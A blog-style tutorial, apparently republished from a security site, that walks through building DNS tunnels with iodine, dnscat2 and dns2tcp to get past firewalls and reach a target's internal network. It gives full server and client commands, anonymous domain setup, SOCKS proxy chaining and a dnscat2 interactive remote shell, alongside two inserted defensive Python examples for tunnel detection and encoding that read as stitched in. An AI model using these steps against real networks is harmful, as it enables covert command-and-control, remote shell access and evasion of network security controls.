An article to understand DNS tunneling

1. DNS tunnel preparation

When I was looking at a site with my buddies, I found that it was not connected to the Internet but could still do DNS queries, so I thought about building a DNS tunnel.

So that readers can see things more clearly, my public server and domain name are not redacted in this article; I hope you will go easy on them.

1. DNS tunnel introduction

DNS tunneling is a kind of tunnel technique. When upper-layer protocols such as HTTP and HTTPS, and forward and reverse port forwarding, all fail, we can try DNS tunneling. DNS tunneling is difficult to block, because whether the traffic is normal business or not, the DNS protocol will inevitably be used for name resolution, so most firewalls allow DNS traffic. If, on a machine that is not connected to the Internet, we query a malicious domain name under our control (***.xxx.ga) and the local DNS server cannot answer it, the local server will iteratively query across the Internet to find the authoritative DNS server for that name. In the end the request falls on the malicious DNS server we built in advance, so the host that cannot go online ends up communicating with our DNS server.
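The paragraph above explains why tunnel traffic gets through most firewalls; the flip side for a defender is that tunnel queries look nothing like ordinary resolution, because every query must carry a different, densely encoded leftmost label. The Python below is an added example, not code from the original article or from any of the tools it describes: it runs a few standard tunnel heuristics (Shannon entropy of the leftmost label, query-name length, and the share of record types such as NULL and TXT that a tunnel client chooses with an option like iodine's -T) over a handful of constructed log lines in an assumed "timestamp client qname qtype" format, and flags the base domain that looks like a tunnel endpoint. Splitting the base domain on the last two labels is a deliberate simplification (no public-suffix list).

```python
import math
from collections import defaultdict

# Constructed sample log lines: "timestamp client qname qtype". The format is an
# assumption for this example, not any product's real log format; the tunnel
# domain example-tunnel.test is an invented stand-in, not a real name.
SAMPLE_LOG = """\
1700000000 10.0.0.5 www.example.com A
1700000000 10.0.0.5 mail.example.com MX
1700000001 10.0.0.7 tgdk3jxq2v4mzq7nbf5wdc3a.ns.example-tunnel.test NULL
1700000001 10.0.0.7 a4h7pqz2lw9x3m8nyv6rbt5c.ns.example-tunnel.test NULL
1700000002 10.0.0.7 m9c2vz8wq4hk7tgb3yp6lx5n.ns.example-tunnel.test TXT
1700000002 10.0.0.7 z3r5xw7nqp9b2dv6hj8ym4kc.ns.example-tunnel.test NULL
1700000003 10.0.0.7 p6t4kd8gyn2xwj7vb5zq9mh3.ns.example-tunnel.test NULL
1700000003 10.0.0.5 cdn.example.com A
"""

# Record types that ordinary clients almost never ask for but tunnels favour,
# because they carry the most payload bytes per answer.
RARE_QTYPES = {"NULL", "TXT"}


def shannon_entropy(text):
    """Bits of entropy per character of `text` (0.0 for an empty or single-symbol string)."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_log(text):
    """Parse the assumed log format into (timestamp, client, qname, qtype) tuples."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip blank or malformed lines
        ts, client, qname, qtype = parts
        records.append((int(ts), client, qname.rstrip(".").lower(), qtype.upper()))
    return records


def base_domain(qname):
    """Registered domain approximated as the last two labels (simplification:
    no public-suffix list, so a name like example.co.uk would be cut too short)."""
    return ".".join(qname.split(".")[-2:])


def domain_stats(records):
    """Per base domain: query count, mean leftmost-label entropy, mean name
    length, share of rare record types and share of distinct leftmost labels."""
    by_domain = defaultdict(list)
    for _, _, qname, qtype in records:
        by_domain[base_domain(qname)].append((qname, qtype))
    stats = {}
    for dom, qs in by_domain.items():
        leftmost = [q.split(".")[0] for q, _ in qs]
        n = len(qs)
        stats[dom] = {
            "queries": n,
            "avg_label_entropy": sum(shannon_entropy(l) for l in leftmost) / n,
            "avg_qname_len": sum(len(q) for q, _ in qs) / n,
            "rare_qtype_ratio": sum(1 for _, t in qs if t in RARE_QTYPES) / n,
            "distinct_ratio": len(set(leftmost)) / n,
        }
    return stats


def flag_tunnels(records, min_queries=3, entropy_threshold=3.5,
                 length_threshold=40, rare_ratio_threshold=0.5):
    """Return the set of base domains whose query pattern resembles a DNS tunnel:
    enough queries, almost all with distinct leftmost labels, and at least two of
    {high label entropy, long names, rare record types}. Thresholds are tunable
    starting points, not calibrated values."""
    flagged = set()
    for dom, s in domain_stats(records).items():
        if s["queries"] < min_queries:
            continue
        hits = sum([
            s["avg_label_entropy"] >= entropy_threshold,
            s["avg_qname_len"] >= length_threshold,
            s["rare_qtype_ratio"] >= rare_ratio_threshold,
        ])
        if hits >= 2 and s["distinct_ratio"] >= 0.8:
            flagged.add(dom)
    return flagged


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for dom, s in domain_stats(recs).items():
        print(dom, {k: round(v, 2) for k, v in s.items()})
    print("suspected tunnel domains:", flag_tunnels(recs))
```

On the sample data example.com stays clean (short, low-entropy labels, A and MX queries), while the invented tunnel domain scores on all three heuristics. Real deployments feed this from passive-DNS or resolver logs and tune the thresholds against a baseline of their own traffic, since CDNs and some anti-spam services also generate long, high-entropy labels.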

Tools for building DNS tunnels currently include iodine, dnscat, dns2tcp, etc.

I am currently using the iodine tool to build it.

2. Preliminary preparation

1 domain name, 1 public network server

You need to register a domain name (preferably anonymous; the recommended registration site is Freenom, a name everyone is familiar with), which is free and anonymous.

When registering, search with the suffix included, otherwise the domain will be shown as unavailable (for example: jingbao123.ga).

After registration is complete, it is recommended to change the domain's name servers at Freenom to Tencent DNSPod, which is more convenient for managing the domain and configuring NS records. I did not find where to add an NS record in Freenom.

DNSPod: https://www.dnspod.cn. Add the newly registered domain in DNSPod, and DNSPod will give you two DNS server addresses.

Change the DNS servers at Freenom to the addresses provided by DNSPod, and resolution of the domain is then delegated to DNSPod.

After DNSPod has management of the domain, add two resolution records there.

The first, an A record, tells the domain name system that the IP address of "www.woshishui120.ga" is "121.xxx.xxx.xxx".

The second, an NS record, tells the domain name system that "ns.woshishui120.ga" is resolved by "www.woshishui120.ga".

So far, the preparatory work has been completed, and the domain name has been bound to our public network server.

2. iodine DNS tunnel construction

Install iodine on the public server; the server side of the tool is iodined and the client is iodine.

Running apt install iodine installs both the server and the client.

1. Server

Deploy the iodine server on the public server (root privileges are required to run it).

iodined -f -c -P 123.com 192.168.200.1 ns.woshishui120.ga -DD

  • -f: run in the foreground
  • -c: disable checking the client IP address of all incoming requests.
  • -P: the password used to authenticate between client and server.
  • -D: specify the debug level; -DD means level two. The number of "D"s grows with the level.

Here 192.168.200.1 is a custom virtual LAN IP address; it is recommended that it not conflict with an existing subnet.
Note! The name given on the command line is the NS record.

After executing this command, a dns0 virtual network interface is created, with the IP address entered in the command just now (192.168.200.1).

**Ubuntu has port 53 open by default (systemd-resolved's stub listener); close it with the commands below**

rm /etc/resolv.conf && echo "nameserver x.x.x.x" >> /etc/resolv.conf    configure the DNS server (change x.x.x.x to a DNS server, e.g. 8.8.8.8)

systemctl stop systemd-resolved    stop the service

systemctl disable systemd-resolved    disable it at boot

2. Client

For the client I use Kali, which comes with the iodine tool.

iodine -f -P 123.com ns.woshishui120.ga -M 200

  • -r: iodine sometimes switches the DNS tunnel to a raw UDP tunnel automatically; this parameter forces DNS tunneling in all cases
  • -M: specify the maximum upstream hostname length.
  • -m: adjust the maximum downstream fragment size.
  • -f: run in the foreground
  • -T: specify the DNS request type; the options are NULL, PRIVATE, TXT, SRV, CNAME, MX and A.
  • -O: specify the data encoding.
  • -P: the password used to authenticate between client and server.
  • -L: specify whether lazy mode is enabled; it is on by default.
  • -I: specify the time interval between two requests.

3. Pitfalls

After my client ran the connection command, it could not connect no matter what (as shown in the picture above). At first I thought my NS record had not taken effect, but it still did not work in the afternoon after I had configured it at noon. I also suspected that Tencent Cloud does not allow port 53, but the experts said port 53 is available, so I asked them for help. In the end the article one of them pointed me to had the answer: https://exploit0.cn/archives/571/

My public server is on Tencent Cloud. At the time I had only opened TCP port 53 in the firewall management panel, not UDP port 53, and DNS resolution uses UDP port 53.

So I quickly opened UDP port 53 in the Tencent Cloud firewall.

Then I ran the command above again.

It can be seen that the connection has succeeded. However, an encoding error is reported; as the expert pointed out, the tool can also specify the encoding, with the -O parameter.

iodine -f -P 123.com ns.woshishui120.ga -M 200 -O base64

Encoding errors still occur, but significantly fewer than before.
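The encoding errors above are worth understanding rather than just working around. DNS names are case-insensitive, and a resolver on the path may fold a query name to lower case; that silently corrupts a base64-encoded label (mixed case) while a base32 label (single case) survives, which is why a tunnel that works through one resolver fails through another. RFC 1035 also limits a label to 63 octets and a name to about 253 characters, which is why tunnel clients fragment data and iodine exposes -M and -m. The Python below is an added example, not iodine's code (iodine uses its own encoding alphabets), with an assumed tunnel domain ns.example-tunnel.test standing in for the article's ns.woshishui120.ga; it models both a case-preserving and a case-folding resolver path and checks which codec survives each.

```python
import base64

# Assumed stand-in for the article's ns.woshishui120.ga (invented value, not a real domain).
TUNNEL_DOMAIN = "ns.example-tunnel.test"
MAX_LABEL = 63   # RFC 1035: a label is at most 63 octets
MAX_NAME = 253   # RFC 1035: practical upper bound on a full name in text form


def encode_name(payload: bytes, codec: str) -> str:
    """Pack `payload` into the leftmost labels of a query name, as a tunnel
    client does. Padding is stripped because '=' is not a hostname character."""
    if codec == "base32":
        text = base64.b32encode(payload).decode().rstrip("=").lower()  # single case
    elif codec == "base64":
        text = base64.b64encode(payload).decode().rstrip("=")          # mixed case
    else:
        raise ValueError("unknown codec: " + codec)
    labels = [text[i:i + MAX_LABEL] for i in range(0, len(text), MAX_LABEL)]
    name = ".".join(labels + [TUNNEL_DOMAIN])
    if len(name) > MAX_NAME:
        raise ValueError("payload does not fit in one query; a real tunnel fragments it")
    return name


def decode_name(name: str, codec: str) -> bytes:
    """Reverse of encode_name, as the tunnel server does on receipt."""
    suffix = "." + TUNNEL_DOMAIN
    if not name.lower().endswith(suffix):
        raise ValueError("query is not for the tunnel domain")
    text = name[:-len(suffix)].replace(".", "")
    if codec == "base32":
        return base64.b32decode(text.upper() + "=" * (-len(text) % 8))
    return base64.b64decode(text + "=" * (-len(text) % 4))


def resolver_path(name: str, folds_case: bool) -> str:
    """Model of the recursive resolvers between client and server: some forward
    the name unchanged, others fold it to lower case (DNS is case-insensitive)."""
    return name.lower() if folds_case else name


def survives(payload: bytes, codec: str, folds_case: bool) -> bool:
    """True if the payload arrives intact after passing the modelled resolvers."""
    try:
        received = resolver_path(encode_name(payload, codec), folds_case)
        return decode_name(received, codec) == payload
    except ValueError:   # binascii.Error is a ValueError subclass
        return False


if __name__ == "__main__":
    sample = b"DNS tunnel payload 0123"   # constructed sample data
    for codec in ("base32", "base64"):
        for folds in (False, True):
            print(codec, "case-folding resolver" if folds else "case-preserving path",
                  "intact" if survives(sample, codec, folds) else "CORRUPTED")
```

Running it shows base32 intact on both paths and base64 corrupted only behind a case-folding resolver; the lower-cased base64 text still decodes without error, just to different bytes, which is exactly the kind of silent corruption that surfaces as sporadic "encoding errors" at the tunnel endpoints.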

After the connection succeeds, a virtual network interface is also created on Kali, with the IP address 192.168.200.2.

Ping the virtual address of the public server from Kali; if the ping succeeds, the DNS tunnel has been established.

Now it is as if a virtual interface has been created on each of the public server and Kali, and the two interfaces can reach each other.

From the public server, connect to Kali's virtual address and use SSH to do dynamic port forwarding.

ssh -D 60688 [email protected]

But at this point this only builds a SOCKS5 proxy on port 60688 of 192.168.200.1 on the public server. It cannot be used from my local machine, because 192.168.200.1 is effectively an intranet address that cannot be reached directly. So the data on port 60688 of the public server's virtual interface address 192.168.200.1 needs to be forwarded to a port on the public server's public address. I have not tried this port forwarding yet (I don't know which tool is better).

I use frp to build a reverse tunnel between the two virtual interfaces.

4. frp builds a tunnel

Start the frp server on the public server.

Then connect from Kali; the server IP that Kali connects to is the IP of the public server's virtual interface.

Kali shows the following

The public server shows the following

That is, a SOCKS5 tunnel has been successfully built on port 60688 of the public server, which amounts to nesting the SOCKS5 tunnel inside the DNS tunnel.

Then you can browse Kali's intranet through port 60688 of the public server (though it feels laggy).

3. dnscat2 DNS tunnel construction

(1) Direct connection mode

The client sends its DNS queries directly to the DNS server at the specified IP address.

1. Server

Public network server as server

ruby dnscat2.rb

2. Client

dnscat --dns server=121.5.145.31,port=53 --secret=4575d232b01034db7eae9baa9ac4dbe2

Kali as the client: the command is the one printed by the server (circled in red in the figure above; change xxxx to the address of your own public server).

I don't know why Kali cannot connect to the server in direct connection mode (if anyone knows, please let me know).

(2) Relay mode

DNS queries are resolved iteratively across the Internet and end up at the specified DNS server. Relay mode is slower than direct mode.

1. Server

Public network server as server

ruby dnscat2.rb ns.woshishui120.ga -e open --no-cache -c 123.com

-e: specify the security level; open means the server does not require clients to encrypt

-c: specify the pre-shared secret

--no-cache: disable caching. Always add this option, because the powershell-dnscat2 client is not compatible with the dnscat2 server's caching mode

2. Client

kali as client

dnscat --secret=123.com ns.woshishui120.ga

Use dnscat2 to build the DNS tunnel. After it is established, a session appears on the server.

After entering session 2 and running shell, a new session is created.

The new session can execute commands.

sessions    list all sessions

session -i 2    enter session 2

shell    create an interactive shell

suspend    return to the previous level

listen 127.0.0.1:888 127.0.0.1:22    the first 127.0.0.1 is the server IP and the second is the client IP; this forwards the client's port 22 to port 888 on the server, which can then be reached with ssh -p 888 127.0.0.1

4. dns2tcp DNS tunnel construction

1. Server

Public network server as server

Change listen in the dns2tcp configuration file to 0.0.0.0 (listening on 0.0.0.0 lets the client connect to the server).

The resources entries can be changed as you like; the format name:public_server_ip:port must be followed. The name and port can be chosen freely, and public_server_ip is the public IP of the public server. The name set here is what the client passes after -r.

dns2tcpd -f /etc/dns2tcpd.conf -F -d 2

  • -f /etc/dns2tcpd.conf specifies the configuration file,
  • -F requires the program to run in the foreground,
  • -d 2 prints debug output at level 2

2. Client

kali as client

dns2tcpc -r ssh -z ns.woshishui120.ga -l 8888 -d 2    (relay mode)

dns2tcpc -r ssh -z ns.woshishui120.ga 121.5.145.31 -l 8888 -d 2    (direct mode)

  • -r is followed by the service name (either ssh or socks); the name is whatever you set in the server's configuration file dns2tcpd.conf,
  • -z is followed by the NS record you set, and then optionally the public IP of your public server <public ip>; if the IP is omitted relay mode is used, otherwise direct mode
  • Relay mode works like ordinary Internet use: the DNS query first goes through the Internet's iterative resolution and finally reaches our malicious DNS server. It is slower than direct mode but safer.
  • -l is followed by the local port; any common port will do. 8888 specifies the port this end of the tunnel listens on
  • -d enables debugging; "-d 2" prints debug output at level 2, the same as on the server side
  • -k password

This command means: connect to the server's resource named ssh, so that accessing port 8888 on Kali is equivalent to accessing port 22 on the VPS.

After entering this command there is no output from either the client or the server. At first I saw no output and thought it had not connected.

ssh ubuntu@<public server> -p 8888 connects to the SSH service of the public server. (After entering this command, both the server and the client produce output.)

If you want to access the Internet through the DNS tunnel, -r must specify the socks resource from the server's configuration file, and a forward SOCKS5 proxy must be opened on port 60688 of the server (the port is set in the server's configuration file as socks:121.5.145.31:60688; both the name socks and the port 60688 can be chosen freely). Otherwise Kali and the public server can only talk to each other, and Kali cannot reach the Internet through the public server. Once a SOCKS5 proxy is listening on port 60688 of the public server, Kali can reach it through the DNS tunnel and then access the Internet through that SOCKS5 port (60688).

To open a forward SOCKS5 proxy on the public server, you can use gost or proxy (goproxy).

gost opens a forward SOCKS5 proxy:

gost -L=socks5://:60688

proxy opens a forward SOCKS5 proxy:

proxy socks -t tcp -p "0.0.0.0:60688" --udp-port 0 --udp

goproxy usage: https://github.com/snail007/goproxy/blob/master/README_ZH.md

Either gost or proxy will do; personally I feel gost is faster.

dns2tcpc -r socks -z ns.woshishui120.ga -l 8888 -d 2

Now you can access the Internet by going through port 8888 on Kali.

Kali configured with the proxy, accessing Baidu

Internet access is possible in an environment where only DNS can get out.

5. Tool usage environments

1. Outside -> Inside

The environment for iodine and dnscat2: the target is on an internal network where only DNS can get out. Build a DNS tunnel from the target to your own public server, then enter the target's internal network through a proxy on the public server and move around inside it.

2. Inside -> Outside

The environment for dns2tcp: I am on an intranet that is not connected to the Internet, but DNS can get out, so I can use dns2tcp to build a DNS tunnel and reach the Internet.

Typical environment: after connecting to the school wifi you must authenticate to log in, otherwise you cannot access the Internet, but the browser can load the login page.


Origin blog.csdn.net/FreeBuf_/article/details/128149766